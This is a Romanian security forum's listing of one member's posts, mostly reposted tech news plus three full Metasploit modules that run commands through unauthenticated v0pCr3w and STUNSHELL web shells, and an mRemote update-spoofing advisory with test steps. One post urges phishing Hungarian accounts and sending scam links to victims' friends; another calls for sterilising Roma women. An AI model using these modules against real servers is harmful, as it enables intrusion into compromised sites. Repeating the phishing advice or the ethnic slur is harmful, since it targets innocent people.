Jump to content

Kwelwild

Active Members
  • Posts

    638
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by Kwelwild

  1. Bravo h4(k3r3, ai spart gugal si iutub! Glumeam, greu sa cauti pe google. Let me google that for you
  2. Uite aici: ..:: Devil's Cafe ::..: Collection of Best Deface Pages
  3. http://video.bzi.ro/video/show/nelson-mondialu-a-dat-in-mintea-copiilor-isterici-35172 )))))))))))
  4. In nimic altceva decat in sterilizarea femeilor rome!
  5. v0pCr3w Web Shell Remote Code Execution ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => 'v0pCr3w Web Shell Remote Code Execution', 'Description' => %q{ This module exploits a lack of authentication in the shell developed by v0pCr3w and is widely reused in automated RFI payloads. This module takes advantage of the shell's various methods to execute commands. }, 'License' => MSF_LICENSE, 'Author' => [ 'bwall <bwall[at]openbwall.com>', # vuln discovery & msf module ], 'References' => [ ['URL', 'https://defense.ballastsecurity.net/wiki/index.php/V0pCr3w_shell'], ['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=f6b534edf37c3cc0aa88997810daf9c0'] ], 'Privileged' => false, 'Payload' => { 'Space' => 2000, 'BadChars' => '', 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd' } }, 'Platform' => ['unix', 'win'], 'Arch' => ARCH_CMD, 'Targets' => [ ['v0pCr3w / Unix', { 'Platform' => 'unix' } ], ['v0pCr3w / Windows', { 'Platform' => 'win' } ] ], 'DisclosureDate' => 'Mar 23 2013', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, "The path to the v0pCr3w shell", "/jos.php"]), ],self.class) end def check shell = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path.to_s), 'vars_get' => { 'lol' => '1' } }) if (shell and shell.body =~ /v0pCr3w\<br\>/ and shell.body =~ /\<br\>nob0dyCr3w/) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def http_send_command(cmd) p = Rex::Text.encode_base64(cmd) res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path.to_s), 'vars_get' => { 'osc' => p } }) if not (res and res.code == 200) fail_with(Exploit::Failure::Unknown, 'Failed to execute the command.') end end def exploit http_send_command(payload.encoded) end end Sursa: v0pCr3w Web Shell Remote Code Execution
  6. Google takes a stand on litigation with patent pledge INTERNET SEARCH GIANT Google on Thursday took a stand against patent litigation in the technology industry, announcing the Open Patent Non-Assertion (OPN) pledge. he company has pledged that it will not sue any "user, distributor or developer of open-source software on specified patents, unless first attacked," referring to the fact that its Android mobile operating system has faced vicious patent attacks from Apple and Microsoft. "We remain committed to an open Internet - one that protects real innovation and continues to deliver great products and services," Google added. Google didn't offer its full patent portfolio, though, instead offering 10 patents to the OPN pledge that relate to its Mapreduce technology, each of which supposedly is widely used throughout the industry. Google said that over time it will add more of its patents and technologies to the pledge, and it encouraged other companies to do the same thing. "We hope the OPN Pledge will serve as a model for the industry, and we're encouraging other patent holders to adopt the pledge or a similar initiative," Google said, listing the benefits as transparency, breadth, defensive protection and durability. Google's pledge echoes Twitter's Innovator's Patent Agreement (IPA) that Twitter announced in April 2012 and in which the microblogging website promised not to become a patent troll. Twitter explained, "The IPA is a new way to do patent assignment that keeps control in the hands of engineers and designers. It is a commitment from Twitter to our employees that patents can only be used for defensive purposes. We will not use the patents from employees' inventions in offensive litigation without their permission. "What's more, this control flows with the patents, so if we sold them to others, they could only use them as the inventor intended." µ Sursa: Google takes a stand on litigation with patent pledge- The Inquirer
  7. Years after its release into the public space, the Zeus malware remains the most popular botnet family on the web. Researchers with McAfee found that the financially-oriented malware was by far the largest botnet on the web, claiming some 57 per cent of botnet infections the company logged thus far in 2013. According to McAfee, Zeus and its variants account for some 57.9 percent of all botnet infections. No other botnet on the list logged more than a nine percent share. Following its first major outbreaks in 2009, the Zeus malware has long been a thorn in the side of the cybersecurity community. Renowned for its ability to operate without tipping off users, Zeus infections reside locally on the victim's PC and inject code directly into browser before a page is displayed. This allows Zeus variants to add data input fields or redirect transmissions from an otherwise legitimate website. According to McAfee researcher Neeraj Thakar, the polymorphic nature of Zeus, which allows the malware to constantly change its own code, makes detecting the malware's signature all but impossible in the wild. "Bot masters have become so advanced and organized that they can churn out thousands of undetectable and unique malware binaries each day," Thakar wrote. "That coupled with the ability to rapidly change the control-server hosting infrastructure allows them to stay active longer without being taken down." The spread of Zeus continues despite efforts by security vendors to remove the various botnets built on the platform. Microsoft recently sued to men in the UK over their involvement in Zeus botnets. Still, McAfee estimates that as many as 37 per cent of the 8.5 million malware payloads it has analysed this year are linked to known botnets, largely variants on Zeus. Sursa: Zeus still king of the botnets, say researchers - IT News from V3.co.uk
  8. By John Leyden • Get more from this author Posted in Management, 26th March 2013 14:56 GMT Java security vulnerabilities - exploited to hack Apple and Facebook this month - are rife across business computers worldwide, according to new research. The overwhelming majority (94 per cent) of PCs and other endpoints running Java software and surveyed by Websense are vulnerable to at least one Java runtime exploit, according to the web security biz. And the exploitable bugs are not just zero-day holes and recently patched vulnerabilities that get all the publicity. Three in four computers used to browse the web are using a Java Runtime Environment version that is more than six months out of date. More than 50 per cent of machines are two years behind. Seizing control of systems by slamming malicious code through holes in Java's security layers is favoured by some state-sponsored hackers and plain old crooks alike, certainly in the last two or three years. For months now, users have been advised to disable Java in their web browsers for exactly this reason, a recommendation echoed in recent alerts from US government's Computer Emergency Readiness Team. Websites that require Java are now the exception not the rule. Harmful code capitalising on Java holes has been commoditised and packaged up into readily available exploit kits - including Cool, Blackhole and Gong Da - allowing any miscreant with an internet connection to wield these weapons for his or her own nefarious purposes. For those on a company intranet and anyone else who absolutely must use Java for a particular website, the best advice is to enable Java execution in one web browser and use it solely for that one site - and have another web browser with the Java runtime disabled for all other internet surfing. Java 1.6 is officially at its end of life after the latest update, numbered 43. Oracle recommends that users migrate to JDK 7 in order to receive any further enhancements and security fixes. The means that more than 77 per cent of users, based on requests from Websense's research, are using a Java engine that is essentially dead and will not be updated, patched or supported by Oracle. Websense's stats come from its Java version detection technology added to its ThreatSeeker Network of cloud-based security technology. The figures incorporate real-time telemetry about which versions of Java are actively being used across tens of millions of endpoints, protect by Websense's technology. A blog post from Websense, featuring a pie-graph based on its figures, and additional security commentary, can be found here. Sursa: Are you in charge of a lot of biz computers? Got Java on them? • The Register
  9. mRemote version 1.50 suffers from an update spoofing vulnerability. [waraxe-2013-SA#100] - Update Spoofing Vulnerability in mRemote 1.50 =============================================================================== Author: Janek Vind "waraxe" Date: 29. March 2013 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-100.html Description of vulnerable software: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ mRemote is a software solution that will allow you to manage all your remote control connections in a single place. Currently it supports the RDP, VNC, SSH2 and Telnet protocols. http://www.royalts.com/main/home/mRemote.aspx http://mremote-portable.softpile.com/58492/download/ Vulnerable is version 1.50, other versions not tested. ############################################################################### 1. Update Spoofing Vulnerability ############################################################################### Current version of mRemote contains security vulnerability in update mechanism, which can be exploited by malicious people to conduct spoofing attacks. When checking for updates, mRemote issues GET request over HTTP: GET /mRemote_Update.txt HTTP/1.1 Host: update.mremote.org Connection: Keep-Alive Server response: HTTP/1.1 200 OK Content-Length: 284 Content-Type: text/plain Last-Modified: Wed, 22 Apr 2009 18:29:48 GMT Accept-Ranges: bytes ETag: "16cc425178c3c91:1e75" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Thu, 28 Mar 2013 14:03:07 GMT Version: 1.50 dURL: http://www.mremote.org/wiki/GetFile.aspx?File=Downloads/mRemote_1.50_Setup.exe clURL: http://update.mRemote.org/mRemote_1.50_ChangeLog.txt imgURL: http://update.mRemote.org/banners/Banner_vRD09.png imgURLLink: http://www.visionapp.com/vRD2009-highlights.html mRemote user can click "Download and Install" button and mRemote will download and install the update. Such update mechanism contains two security flaws: 1. Update check is done over unencrypted HTTP channel. Malicious third party is able to conduct Man-in-the-Middle (MitM) attacks and spoof server response. In this way it is possible to instruct mRemote to download malicious update. 2. mRemote will execute downloaded update without digital signature verification. Testing: tests were done using Windows 7 and Apache webserver. Steps: 1. modify "windows/system32/drivers/etc/hosts" file in order to emulate DNS spoofing: 127.0.0.1 update.mremote.org 2. create text file "mRemote_Update.txt" to the webserver main directory with following content: Version: 1.51 dURL: http://localhost/calc.exe clURL: http://localhost/mRemote_1.51_ChangeLog.txt imgURL: http://update.mRemote.org/banners/Banner_vRD09.png imgURLLink: http://www.visionapp.com/vRD2009-highlights.html 3. create text file "mRemote_1.51_ChangeLog.txt" to the webserver main directory with following content: New version 1.51 available! 4. Place "calc_EN.exe" file to the webserver main directory. 5. Open mRemote, it will check for updates automatically. Response: New version 1.51 available! 6. Press "Download and Install" button. Successful download ends with response: Download complete! mRemote will now quit and begin with the installation. 7. Press "OK" button and downloaded exe file will be executed. Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ come2waraxe@yahoo.com Janek Vind "waraxe" Waraxe forum: http://www.waraxe.us/forums.html Personal homepage: http://www.janekvind.com/ Random project: http://albumnow.com/ ---------------------------------- [ EOF ] ------------------------------------ Sursa: mRemote 1.50 Update Spoofing ? Packet Storm
  10. Description: SMB-Hash Cracking/Remote Login Credits: danielhaake.de Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Smb-Hash Cracking/Remote Login
  11. Welcome, speram sa vad la Location "Hackerville"
  12. This Metasploit module exploits unauthenticated versions of the "STUNSHELL" web shell. This Metasploit module works when safe mode is disabled on the web server. This shell is widely used in automated RFI payloads. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => 'STUNSHELL Web Shell Remote Code Execution', 'Description' => %q{ This module exploits unauthenticated versions of the "STUNSHELL" web shell. This module works when safe mode is disabled on the web server. This shell is widely used in automated RFI payloads. }, 'License' => MSF_LICENSE, 'Author' => [ 'bwall <bwall[at]openbwall.com>' # vuln discovery & msf module ], 'References' => [ ['URL', 'https://defense.ballastsecurity.net/wiki/index.php/STUNSHELL'], ['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=a4cd8ba05eb6ba7fb86dd66bed968007'] ], 'Privileged' => false, 'Payload' => { 'Space' => 10000, # Value determined by web server's POST limits 'BadChars' => '', 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd' } }, 'Platform' => ['unix', 'win'], 'Arch' => ARCH_CMD, 'Targets' => [ ['stunshell / Unix', { 'Platform' => 'unix' } ], ['stunshell / Windows', { 'Platform' => 'win' } ] ], 'DisclosureDate' => 'Mar 23 2013', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI',[true, "The path to the andalas_oku shell", "/IDC.php"]), ],self.class) end def check uri = normalize_uri(target_uri.path.to_s) request_parameters = { 'method' => 'POST', 'uri' => uri, 'vars_post' => { 'cmd' => "echo 'andalas_oku test parameter'" } } shell = send_request_cgi(request_parameters) if (shell and shell.body =~ /andalas_oku test parameter/) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def http_send_command(cmd) uri = normalize_uri(target_uri.path.to_s) request_parameters = { 'method' => 'POST', 'uri' => uri, 'vars_post' => { 'cmd' => cmd } } res = send_request_cgi(request_parameters) if not (res and res.code == 200) fail_with(Exploit::Failure::Unknown, 'Failed to execute the command.') end end def exploit http_send_command(payload.encoded) end end Sursa: STUNSHELL Web Shell Remote Code Execution ? Packet Storm
  13. This Metasploit module exploits unauthenticated versions of the "STUNSHELL" web shell. This Metasploit module works when safe mode is enabled on the web server. This shell is widely used in automated RFI payloads. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => 'STUNSHELL Web Shell Remote PHP Code Execution', 'Description' => %q{ This module exploits unauthenticated versions of the "STUNSHELL" web shell. This module works when safe mode is enabled on the web server. This shell is widely used in automated RFI payloads. }, 'License' => MSF_LICENSE, 'Author' => [ 'bwall <bwall[at]openbwall.com>' # vuln discovery & msf module ], 'References' => [ ['URL', 'https://defense.ballastsecurity.net/wiki/index.php/STUNSHELL'], ['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=a4cd8ba05eb6ba7fb86dd66bed968007'] ], 'Privileged' => false, 'Payload' => { 'Keys' => ['php'], 'Space' => 10000, 'DisableNops' => true }, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [ ['stunshell', {}] ], 'DisclosureDate' => 'Mar 23 2013', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI',[true, "The path to the andalas_oku shell", "/IDC.php"]), ],self.class) end def check uri = normalize_uri(target_uri.path.to_s) request_parameters = { 'method' => 'POST', 'uri' => uri, 'vars_post' => { 'cmd' => "php_eval", 'php_eval' => "print 'andalas_oku test parameter';" } } shell = send_request_cgi(request_parameters) if (shell and shell.body =~ /andalas_oku test parameter/) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def http_send_command(cmd) uri = normalize_uri(target_uri.path.to_s) request_parameters = { 'method' => 'POST', 'uri' => uri, 'vars_post' => { 'cmd' => "php_eval", "php_eval" => cmd } } res = send_request_cgi(request_parameters) end def exploit http_send_command(payload.encoded) end end Sursa: STUNSHELL Web Shell PHP Eval ? Packet Storm
  14. Chiar nu ai trecut pe aici?
  15. Spanish - Wireless Network Security Download PDF Sursa: Exploits Database by Offensive Security
  16. Noua versiune a browserului are o interfata mai placuta si se bucura de un upgrade pe partea de securitate. Daca esti fan al browserului Chrome, afla ca acum poti sa iti descarci versiunea cu numarul 26, indiferent daca ai un Mac sau un calculator cu Windows sau Linux. Noul Google Chrome vine cu cateva imbunatatiri importante. Interfata a fost modernizata, iar la capitolul securitate se remarca un progres. Una dintre functiile noi este Ask Google for suggestions, care verifica daca nu ai mancat litere la scrierea mailurilor, inclusiv in cazul in care scrii in limba romana. Corectarea gramaticala este activata, deocamdata, doar pentru limba engleza. Fanii browserului se vor bucura sa descopere ca acum pot avea mai multe profiluri pe acelasi calculator. Download Google Chrome 26 Sursa: Download Google Chrome 26. Browserul vine cu mai multe imbunatatiri - www.yoda.ro
  17. Welcome back Tex, ma bucur sa aud ca esti liber!
  18. Iarasi hackeri de slowloris?! Ca sa faca o treaba buna, macar sa atace ungurii. PS: De ce distrugi postul in halul asta? Poza aia banala nu isi are rostul la fel si scrisul pe center.
  19. http://www.youtube.com/watch?v=3GVcWFDeVZE
  20. Prima data m-am speriat, in prima secunda am crezut ca e deface Cat despre design imi place, nu mai sunt o gramada de culori, frumos.
  21. E mult pana prindeti un cont, apoi folositi-va de acel cont si trimiteti link-uri catre 'scam' prietenilor lor. Asa veti prinde mai multe conturi de unguri a caror poza de profil va fi cea cu fata.
  22. Description: Streaming media files using netcat listener : apt-get install mpg123 or client nc -l -p port | mpg123 - server : cat song.mp3 | nc ip port Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Streaming Media Files Using Netcat
  23. Youtube, cea mai tare retea de clipuri din lume, a atins o cifra fabuloasa: 1 miliard de vizitatori lunari. Pentru a arata mai simplu ce inseamna aceasta cifra, site-ul Inquisitr.com scrie: - Unul din doi utilizatori de internet intra pe Youtube - Cifra este echivalentul a 10 Super Bowl-uri - Daca Youtube ar fi o tara, atunci s-ar clasa pe 3 in lume, dupa China si India, ca numar de locuitori - PSY si Madonna ar trebui sa repede de 200.000 de ori spectacolele cu casa inchisa din Madiso Square Garden pentru ca toti acesti oameni sa le vada. Pentru cei care cred ca stiu Youtube "de-o viata", iata aici primul videoclip uploadat vreodata: intr-o zi de sambata din 23 aprilie 2005, la ora 8:27. Sursa: Youtube a atins 1 miliard de vizitatori pe luna: Daca ar fi o tara, ar fi pe trei in lume, dupa India si China - www.yoda.ro
  24. YouTube Romania, aproape de lansare; compozitorii, incantati ca vor primi bani pentru melodiile lor Grupul Google pregateste lansarea YouTube Romania, asteptata cu mare interes de compozitorii romani, care urmeaza sa primeasca bani pentru videoclipurile incarcate pe acest site, in baza unui contract semnat, pe 6 martie, intre Google Ireland Limited si UCMR-ADA. Organismul de gestiune a drepturilor de autor Uniunea Compozitorilor si Muzicologilor din Romania - Asociatia pentru Drepturile de Autor (UCMR-ADA), care reprezinta pe teritoriul Romaniei 7.800-7.900 de compozitori si textieri de muzica, si-a informat membrii ca, pe 6 martie, a semnat cu Google Ireland Limited o "Autorizatie licenta neexclusiva de utilizare a operelor muzicale prin streaming oneros" pentru site-ul YouTube. "Prin intermediul acestui contract, UCMR-ADA a obtinut pentru membrii sai dreptul de a colecta remuneratii, pentru utilizarile operelor muzicale pe internet, pe site-ul YouTube, prin streaming", se spune in anuntul UCMR-ADA. Organismul de gestiune a drepturilor de autor isi atentioneaza membrii ca "data intrarii in vigoare a autorizatiei-licenta neexclusiva este data lansarii platformei YouTube-Romania". "Aceasta data este stabilita de partenerii nostri de la Google, iar modalitatea de comunicare catre public va fi, cu siguranta, una de impact mediatic", precizeaza UCMR-ADA. Contactati de MEDIAFAX si intrebati cand va fi lansata versiunea locala a YouTube, reprezentantii Google Romania au dezvaluit interesul de a aduce noi servicii pentru utilizatorii si companiile din Romania. "YouTube a devenit una dintre cele mai populare platforme de divertisment prin care oamenii pot interactiona, viziona si incarca continut video, inclusiv in Romania. Ne bucuram sa aducem noi servicii pentru utilizatorii si companiile din tara noastra, pentru a inlesni accesul la cat mai mult continut local, dar momentan nu avem mai multe detalii sa oferim", au declarat reprezentantii Google Romania. Este de asteptat ca prin lansarea YouTube Romania publicul sa aiba acces mai usor la un continut localizat, insa cei interesati vor putea accesa in continuare varianta internationala a YouTube. Surse au declarat, pentru MEDIAFAX, ca lansarea versiunii YouTube Romania va avea loc in acest an. Pe de alta parte, cantaretii par a fi cei mai interesati de lansarea versiunii localizate a YouTube, deoarece - in baza contractului semnat intre UCMR-ADA si Google - vor putea sa incaseze bani pentru melodiile lor care vor fi postate pe YouTube Romania. Insa la fel cum nu se cunoaste inca data oficiala de lansare a YouTube Romania, nici UCMR-ADA nu a comunicat detaliile legate de procentele pe care le va incasa de la YouTube pentru membrii sai. Contactati de MEDIAFAX, reprezentantii UCMR-ADA au refuzat sa dea detalii din contract si au invocat clauzele de confidentialitate impuse de Google. Surse din industrie au declarat, pentru MEDIAFAX, ca exista o metodologie pentru utilizarea operelor muzicale pe internet si, in baza acesteia, compozitorii romani vor primi un procent din veniturile pe care le va realiza YouTube Romania. Conform acelorasi surse, acest procent ar fi in jur de 5%. Lansarea YouTube Romania este vazuta ca un fapt pozitiv de compozitorii romani, avand in vedere ca multi dintre ei spun ca nu au primit pana acum bani pentru difuzarea melodiilor lor pe site-ul international YouTube. Astfel, compozitorul Mihai Ogasanu a declarat ca lansarea YouTube Romania este "un lucru foarte bun", pentru ca este ceva "gandit si dorit de mult" de catre cei care detineau drepturile pentru melodiile postate pe YouTube.com. "Este o idee foarte buna, pentru ca in felul acesta se pot gestiona drepturile mult mai bine, in ceea ce priveste colaborarea dintre UCMR-ADA si YouTube Romania. Cred ca si artistii romani isi vor pune piesele pe YouTube Romania. Mi se pare un lucru foarte bun, nu stiam exact rezultatele demersului (...) E foarte bine pentru noi, pentru artisti, pentru compozitori si textieri, cei care sunt in spatele melodiilor, si bineinteles pentru imagine, mai departe, banuiesc ca vor negocia si alte organisme de gestiune colectiva (cu YouTube, n.r.). Pentru ca pe YouTube Romania nu va fi doar muzica, ne putem astepta si la continut cinematografic autohton", a spus Mihai Ogasanu. Intrebat daca a incasat vreodata bani din drepturi de autor in urma melodiilor compuse de el si postate pe site-ul international YouTube, Mihai Ogasanu a spus: "Nu am cunostinta de acest lucru". Calin Goia, solistul trupei Voltaj, a declarat pentru MEDIAFAX ca nu stia despre contractul semnat de UCMR-ADA cu Google, pentru YouTube Romania. El a precizat insa ca UCMR-ADA a inceput sa colecteze drepturile de autor si de pe online. "Fata de acum cinci-sase-sapte ani, au inceput sa se mai stranga niste banuti", a spus Calin Goia, precizand insa ca situatia in Romania este foarte departe de ceea ce se intampla la nivel international, unde artistii pot sa traiasca foarte bine din drepturile de autor care li se cuvin. Pe de alta parte, Cornel Ilie, solistul trupei Vunk, a declarat pentru MEDIAFAX ca parteneriatul semnat de UCMR-ADA este binevenit. "Inca nu se stie cand va fi lansat YouTube Romania, dar e binevenit. Nu stiu nici cum o sa se monitorizeze exact, cum o sa se imparta veniturile", a spus Cornel Ilie. El a precizat ca, pana in prezent, trupa Vunk nu a incasat bani de la YouTube.com pentru melodiile sale. Florin Grozea, fondatorul trupei Hi-Q, compozitor, textier si consilier in drepturi de autor, dupa cum se prezinta pe blogul personal, este cel care a facut initial publica informatia ca UCMR-ADA va colecta drepturi de autor de pe YouTube. El a declarat, intr-un interviu pentru manafu.ro, ca "autorii, compozitorii, textierii si casele de discuri vor primi in sfarsit drepturi de autor din utilizarea muzicii lor pe YouTube", cel mai mare site cu muzica din lume. "Veniturile din publicitate se vor imparti dupa un algoritm stabilit prin acest acord si o parte din banii castigati de YouTube in Romania se vor duce la autorii romani (si straini). Nu s-au publicat detalii despre contract, dar probabil ca autorii romani vor lua (prin intermediul UCMR-ADA) intre 5 si 10% din veniturile YouTube realizate pe teritoriul Romaniei. Procente asemanatoare platesc si radiourile, televiziunile si alti utilizatori ai muzicii in Romania (conform negocierilor directe dintre UCMR-ADA si asociatiile care reprezinta aceste companii media)", a explicat Florin Grozea. Contactat de MEDIAFAX, Dan Popi, cel care conduce casa de discuri Cat Music, a declarat ca vede acordul semnat de UCMR-ADA cu Google, pentru YouTube Romania, ca pe "un pas esential". "Regret ca a durat atat de mult", a spus Dan Popi. El a precizat ca, pana in prezent, Cat Music a incasat bani din drepturi de autor de la YouTube.com. "Am incasat, printr-un intermediar, dar numai international, fara Romania. Negociem cu Google acum, Cat Music avand cel mai mare canal de YouTube din Romania", a spus Dan Popi. El a mai spus ca este imposibil ca UCMR-ADA sa gestioneze direct si drepturile de autor ale compozitorilor romani de pe YouTube.com. "Practica in domeniu face imposibil acest lucru in mod direct. Organele echivalente UCMR-ului colecteaza in fiecare teritoriu, iar apoi vireaza banii UCMR-ului daca exista acorduri de reciprocitate", a spus Dan Popi. Popi are un raspuns si la intrebarea ce ar mai trebui facut in domeniul site-urilor de partajare de videoclipuri pentru ca detinatorii de drepturi sa isi primeasca banii: "Trebuie aplicata legea, aici autoritatile ar trebui sa ia mai in serios pirateria pe internet". Si reprezentantii casei de discuri Roton au declarat, pentru MEDIAFAX, ca asteapta de mult aceasta initiativa, a localizarii YouTube. "Localizarea YouTube in Romania este un pas foarte important, pentru ca ne va ajuta sa pastram o linie cat mai coerenta de comunicare a pieselor noastre si impreuna cu artistii si autorii vom putea promova operele pe canalul oficial, in mod exclusiv, pentru a ajunge cat mai devreme la cat mai multi dintre cei ce vor sa asculte/vizioneze. Asteptam de mult aceasta initiativa, de acum inainte conturile vor putea fi mai usor personalizate, continutul muzical va putea fi mult mai atent promovat si indeaproape supravegheat. La fel de important pentru noi este faptul ca vom putea comunica direct cu partenerii de la YouTube pentru crearea de campanii comune", au mai spus reprezentantii Roton. Site-ul de partajare de fisiere video YouTube, proprietate a grupului Google, a devenit una dintre cele mai importante surse de informare din lume, potrivit unui studiu realizat de centrul de cercetare american Pew, publicat in Statele Unite in luna iulie 2012. Acest studiu a evidentiat faptul ca subiectele de actualitate au fost cele mai cautate pe YouTube intr-o perioada de 15 luni, intre 2011 si 2012. Totodata, YouTube sustine ca peste 72 de ore de inregistrari video sunt postate pe site in fiecare minut si ca peste patru miliarde de fisiere video sunt vizionate in fiecare zi. In plus, joi, YouTube a anuntat ca are peste un miliard de utilizatori unici in fiecare luna. De asemenea, compania a anuntat ca cele mai importante branduri din lume desfasoara in prezent campanii pe YouTube. Sursa: YouTube Romania, aproape de lansare; compozitorii, incantati ca vor primi bani pentru melodiile lor - www.yoda.ro
×
×
  • Create New...